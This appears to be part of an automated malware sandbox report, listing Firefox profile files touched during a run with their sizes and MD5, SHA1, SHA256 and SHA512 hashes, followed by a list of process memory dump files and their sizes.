8c58171f4e391647222efe129ac96ae97aed59eb9c96a7b4c01f41dc18f0f4268c32269b080b4b46550471842583c34f96099df5eff2839515d08829bbc00174

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tsy7k28m.default-release\prefs.js

Filesize
6KB

MD5
b5cdfa06f34e0f695b3c45dcccafb548

SHA1
d7af7a9f8d87105db6f2011696450551dba39e53

SHA256
ab9484b1c49a63092ace00150cc9bd1130dd508ac71a913e06022df38c28e4d9

SHA512
43f22788d65e35d6dc15b6973b58b24c30ed149ec7d8656f99ae7cf90060e31ba41000ec38fc767537e66ec2954a4cab6bfb3332e91c7636da2355fe348ca94a

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tsy7k28m.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
1KB

MD5
17143b79285cb8a9621dada81b2097ba

SHA1
61c5ad63ee8d3c563a16148f8c7ae791613b285b

SHA256
a96631d4e8a32b22444a338db4113eb1eb11ef5f430151875b3c112d0ac2b21c

SHA512
316c761fad4a2f800a3952638a3b1398b4ed3190557c86ef1fd46e541f46801a9d8ce935cd4bca499d088f0a2f3ea089622d8601922f7acaa625145f139d44fd

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tsy7k28m.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

Filesize
424KB

MD5
83588bea45053342fe04803cd8496ce7

SHA1
040f610af329f9b4868a1a387dcb073772940ece

SHA256
7532b94b6986d01e60bdd82dbd0cb5249c80571558257e429e0fdb022b7f334f

SHA512
8866a3d366660e630cd98a100b4efb850840455bea6735799ac688ab0d04255003d117c5412e8a95d20d481b7754eb3264ba3f7fbc0a997e37fa02d9fc20ea3b

Download Submit
memory/1036-269-0x000001ECF6D80000-0x000001ECF6D92000-memory.dmp

Filesize
72KB

Download
memory/1036-298-0x000001ECF6A00000-0x000001ECF6A10000-memory.dmp

Filesize
64KB

Download
memory/1036-120-0x000001ECDC560000-0x000001ECDC59C000-memory.dmp

Filesize
240KB

Download
memory/1036-204-0x000001ECF6B60000-0x000001ECF6B7E000-memory.dmp

Filesize
120KB

Download
memory/1036-268-0x000001ECF6B50000-0x000001ECF6B5A000-memory.dmp

Filesize
40KB

Download
memory/1036-203-0x000001ECF6B90000-0x000001ECF6BE0000-memory.dmp

Filesize
320KB

Download
memory/1036-121-0x000001ECF6A00000-0x000001ECF6A10000-memory.dmp

Filesize
64KB

Download
memory/1492-278-0x000002ADE5EC0000-0x000002ADE5ED0000-memory.dmp

Filesize
64KB

Download
memory/1492-277-0x000002ADE5EC0000-0x000002ADE5ED0000-memory.dmp

Filesize
64KB

Download
memory/2096-176-0x000002312A1B0000-0x000002312A1C0000-memory.dmp

Filesize
64KB

Download
memory/2096-175-0x000002312A1B0000-0x000002312A1C0000-memory.dmp

Filesize
64KB

Download
memory/4328-155-0x000002AA56BF0000-0x000002AA56C00000-memory.dmp

Filesize
64KB

Download
memory/4328-157-0x000002AA56BF0000-0x000002AA56C00000-memory.dmp

Filesize
64KB

Download
memory/4328-153-0x000002AA56BF0000-0x000002AA56C00000-memory.dmp

Filesize
64KB

Download
memory/4328-129-0x000002AA6F420000-0x000002AA6F496000-memory.dmp

Filesize
472KB

Download
memory/4328-126-0x000002AA56C60000-0x000002AA56C82000-memory.dmp

Filesize
136KB

Download